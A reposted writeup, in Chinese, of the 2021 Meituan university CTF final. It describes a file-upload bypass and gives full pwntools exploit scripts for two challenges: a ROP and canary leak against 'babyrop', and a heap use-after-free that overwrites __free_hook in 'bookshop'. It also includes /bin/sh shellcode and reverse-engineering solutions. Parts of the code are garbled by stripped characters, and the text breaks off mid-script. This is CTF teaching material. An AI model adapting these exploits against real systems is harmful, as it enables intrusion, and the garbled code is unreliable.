標題：2021年第四屆美團網絡安全高校挑戰賽決賽writeup(轉）

[taibeihacker]

Web​

HackMe​

開局一個文件上傳，utf-16的編碼繞過，然後根據提示爆破文件名爆破最後四位0000 - 9999， 就可以訪問到了，注意是12小時。

Pwn​

babyrop​

DEBUG
# _*_ coding:utf-8 _*_
from pwn import *
import numpy as np
context.log_level='debug'
#context.terminal=['tmux', 'splitw', '-h']
prog='./babyrop'
#elf=ELF(prog)
p=process(prog)#,env={'LD_PRELOAD':'./libc-2.27.so'})
libc=ELF('./libc-2.27.so')
#p=remote('123.57.207.81',44823)
def debug(addr,PIE=False):
debug_str=''
if PIE:
text_base=int(os.popen('pmap {}| awk '{{print $1}}''.format(p.pid)).readlines()[1], 16)
for i in addr:
debug_str+='b *{}\n'.format(hex(text_base+i))
gdb.attach(p,debug_str)
else:
for i in addr:
debug_str+='b *{}\n'.format(hex(i))
gdb.attach(p,debug_str)
def dbg():
gdb.attach(p)
#-----------------------------------------------------------------------------------------
s=lambda data .send(str(data)) #in case that data is an int
sa=lambda delim,data .sendafter(str(delim), str(data))
sl=lambda data .sendline(str(data))
sla=lambda delim,data .sendlineafter(str(delim), str(data))
r=lambda numb=4096 .recv(numb)
ru=lambda delims, drop=True .recvuntil(delims, drop)
it=lambda .interactive()
uu32=lambda data :u32(data.ljust(4, '\0'))
uu64=lambda data :u64(data.ljust(8, '\0'))
bp=lambda bkp dbg.bp(bkp)
li=lambda str1,data1 :log.success(str1+'========'+hex(data1))
def dbgc(addr):
gdb.attach(p,'b*' + hex(addr) +'\n c')
def lg(s,addr):
print('\033[1;31;40m%20s--0x%x\033[0m'%(s,addr))
sh_x86_18='\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'
sh_x86_20='\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'
sh_x64_21='\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05'
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------sa('name? \n','a'*0x19)
debug([0x400752])
main=0x40075b
val=0x400717
read_plt=0x400600
bss=0x601010
puts_got=0x600fc0
puts_plt=0x4005d0
printf_plt=0x4005f0
sa('name? \n','a'*0x19)
ru('a'*0x19)
rdi=0x400913
canary=(uu64(ru(',')[0:7]))8
lg('canary',canary)
sla('his challenge\n',str(0x4009ae))
pay=(p64(0x601010+8)*3)
sa('message\n',pay+p64(canary)+p64(bss+8)+p64(0x40075c))
sleep(0.5)
#pay=p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(val)+'\n'
#s(pay)
sa('name? \n',p64(rdi)+p64(puts_plt)+p64(0x40075b)+'\n')
sla('his challenge\n',str(0x4009ae))
pay=p64(puts_plt)+p64(0x400717)+'a'*8
sa('message\n',pay+p64(canary)+p64(bss+8)+p64(0x40075c))
sa('name? \n',p64(rdi)+p64(0x600fc0)+p64(0x000000000040090c)+'\n')
sla('his challenge\n',str(0x4009ae))
pay=p64(puts_plt)+p64(0x400717)+'a'*8
sa('message\n',pay+p64(canary)+p64(bss+8)+p64(0x0000400911))
libc_base=uu64(ru('\x7f',drop=False)[-6:])-(0x7f23ededeaa0-0x7f23ede5e000)
lg('libc_base',libc_base)
sa('name? \n',p64(rdi)+p64(libc.search('/bin/sh').next()+libc_base)+p64(libc_base+libc.sym['system'])+'\n')
sla('his challenge\n',str(0x4009ae))
pay=p64(puts_plt)+p64(0x400717)+'a'*8
sa('message\n',pay+p64(canary)+p64(bss+8)+p64(0x0000000000400911))
lg('libc_base',libc_base)
it()

bookshop​

UAF fastbin+tcache
# _*_ coding:utf-8 _*_
from pwn import *
context.log_level='debug'
prog='./bookshop'
#elf=ELF(prog)
p=process(prog)#,env={'LD_PRELOAD':'./libc-2.27.so'})
libc=ELF('./libc-2.31.so')
#p=remote('123.57.132.168',30042)
def debug(addr,PIE=True):
debug_str=''
if PIE:
text_base=int(os.popen('pmap {}| awk '{{print $1}}''.format(p.pid)).readlines()[1], 16)
for i in addr:
debug_str+='b *{}\n'.format(hex(text_base+i))
gdb.attach(p,debug_str)
else:
for i in addr:
debug_str+='b *{}\n'.format(hex(i))
gdb.attach(p,debug_str)
def dbg():
gdb.attach(p)
#-----------------------------------------------------------------------------------------
s=lambda data .send(data) #in case that data is an int
sa=lambda delim,data .sendafter(delim, data)
sl=lambda data .sendline(data)
sla=lambda delim,data .sendlineafter(delim, data)
r=lambda numb=4096 .recv(numb)
ru=lambda delims, drop=True .recvuntil(delims, drop)
it=lambda .interactive()
uu32=lambda data :u32(data.ljust(4, '\0'))
uu64=lambda data :u64(data.ljust(8, '\0'))
bp=lambda bkp dbg.bp(bkp)
li=lambda str1,data1 :log.success(str1+'========'+hex(data1))
def dbgc(addr):
gdb.attach(p,'b*' + hex(addr) +'\n c')
def lg(s,addr):
print('\033[1;31;40m%20s--0x%x\033[0m'%(s,addr))
sh_x86_18='\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'
sh_x86_20='\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'
sh='\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05'
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------
def choice(idx):
sla(' ',str(idx))
def add(con):
choice(1)
sla(' ',con)
def delete(idx):
choice(2)
sla('bag?',str(idx))
def show(idx):
choice(3)
sla('read?',str(idx))
def exp():
sla('number?',str(0x68))
for i in range(10):
add(6*(p64(0)+p64(0x71)))
add(p64(0)*4+(p64(0x421)+p64(0x41)))
for i in range(7):
delete(i)
delete(8)
show(1)
ru('Content: ')
heap=uu64(ru('\n')[-6:])
lg('heap',heap)
for i in range(7):
add(6*(p64(0)+p64(0x71)))
delete(8)
add(p64(heap+0x40))
add(p64(0))
add(p64(0)*3+p64(0x421))
lg('heap',heap+0x40)
#dbg()
delete(1)
show(1)
libc_base=uu64(ru('\x7f',drop=False)[-6:])-(0x7f3f97308be0-0x7f3f9711d000)
lg('libc',libc_base)
fh=libc_base + libc.sym['__free_hook']
sys=libc_base + libc.sym['system']
delete(2)
delete(20)
delete(0)
add(p64(fh)*12)
add('/bin/sh\x00')
add(p64(sys))
delete(22)
it()
if __name__=='__main__':
exp()

Re​

Random​

直接調試發現key不變
q=[0x3E,0xCD,0xAA,0x8E,0x96,0x1F,0x89,0xCD,0xDB,0xF1,
0x70,0xF2,0xA9,0x9C,0xC2,0x8B,0xF2,0xFE,0xAD,0x8B,
0x58,0x7C,0x2F,0x03,0x4A,0x65,0x31,0x89,0x76,0x57,
0x88,0xDF,0xB8,0xE9,0x01,0xE9,0xDE,0xE5,0x86,0x68,
0x8F,0x24,0xD3,0x5A]
k=[0x58,0xa1,0xcb,0xe9,0xed,0x2c,0xec,0xfb,0xe9,0xc4,0x16,0x97,0x99,0xb1,0xa4,0xe9,0xc3,0xc6,0x80,0xbf,0x3e,0x44,0x18,0x2e,0x73,0x56,0x52,0xb8,0x5b,0x66,0xed,0xbc,0x8a,0xd8,0x36,0x8f,0xe6,0xd3,0xb1,0x51,0xb9,0x59,0xd3,0x5a]
f=''
for i in range(len(k)):
f+=chr(q^k)
print f
flag{3e625fe0-fb18-4f87-93c1-1ec217f86796}

wow​

upx -d脫殼
patch掉這一段
.text:00402352 call $+5
.text:00402357 add [esp+4+var_4], 6
.text:0040235B dec eax
.text:0040235C retfint __cdecl main(int argc, const char **argv, const char **envp)
{
int *v3; //esi
int *v4; //ebp
int v5; //ecx
int v6; //ebp
int v7; //esi
int v8; //ecx
int v9; //edi
unsigned int i; //ebx
unsigned int v11; //ecx
unsigned int v12; //edx
unsigned int v13; //ecx
int *v15; //[esp+10h] [ebp-68h]
int v16; //[esp+2Ch] [ebp-4Ch]
int v17; //[esp+30h] [ebp-48h]
int v18; //[esp+34h] [ebp-44h]
char v19[24]; //[esp+38h] [ebp-40h] BYREF
char v20[24]; //[esp+50h] [ebp-28h] BYREF
int v21; //[esp+74h] [ebp-4h]
int savedregs; //[esp+78h] [ebp+0h] BYREF
v4=savedregs;
sub_4024C0(v20);
v21=0;
sub_402740(dword_42AFD0, v20);
scanf(v19, input);
LOBYTE(v21)=1;
if ( strlen(v20) !=36 )
{
printf((int)unk_42AE80, 'wrong\n');
v17=0;
v16=0;
LABEL_9:
*((_BYTE *)v4 - 4)=0;
sub_402430(v4 - 16);
*(v4 - 1)=-1;
sub_402430(v4 - 10);
return *(v4 - 19);
}
v18=sub_402420(v20);
v15=v3;
v5=*(_DWORD *)(v18 + 34);
v6=12;
v7=0;
do
{
v7 +=0x67452301;
v8=v5 - 1;
v9=v7 + 4;
for ( i=0; i 8; ++i )
{
v11=v8 + 2;
v12=(((v11 + 1) 3) + (v7 ^ (16 * (v11 + 1)))) ^ (((((v11 + 1) 3) + (v7 ^ (16 * (v11 + 1)))) ^ ((v11 + 1) 3))
+ ((v11 5) ^ (4 * v11)));
*(_DWORD *)v12 +=v12;
v6 +=2;
v9 +=4;
v8=*(_DWORD *)v12 + 1;
}
v13=*(_DWORD *)v12 + 3;
*(_DWORD *)(v7 + 32) +=(((v13 + 1) 3) + (v7 ^ (16 * (v13 + 1)))) ^ (((((v13 + 1) 3) + (v7 ^ (16 * (v13 + 1)))) ^ ((v13 + 1) 3))
+ ((v13 5) ^ (4 * v13)));
v5=*(_DWORD *)(v7 + 32);
v6 +=2;
}
while ( v6 );
v4=v15;
if ( sub_4029F0(v15 - 10, v15 - 16) )
{
printf((int)unk_42AE80, 'right\n');
*(v15 - 19)=0;
goto LABEL_9;
}
printf((int)unk_42AE80, 'wrong\n');
*((_BYTE *)v15 - 4)=0;
sub_402430(v15 - 16);
*(v15 - 1)=-1;
return sub_402430(v15 - 10);
}
看出差不多是xxtea加密
看彙編，找到key=[0xEFCDAB89,0x10325476,0x98BADCFE,0xC3D2E1F0]
DELTA0x67452301
密文
0xD8F758F5,0x526849DB,0xE2D72563,0x485EEFAC,0x608F4BC6,0x5859F76A,0xB03565A3,0x3E4091C1,0xD3DB5B9A
網上找個腳本解密
#include stdio.h
#include stdint.h
#define DELTA0x67452301
#define MX (((z5^y2) + (y3^z4)) ^ ((sum^y) + (key[(p3)^e] ^ z)))
void xxtea(uint32_t* v, int n, uint32_t* key)
{
uint32_t y, z, sum;
unsigned p, rounds, e;
if (n &g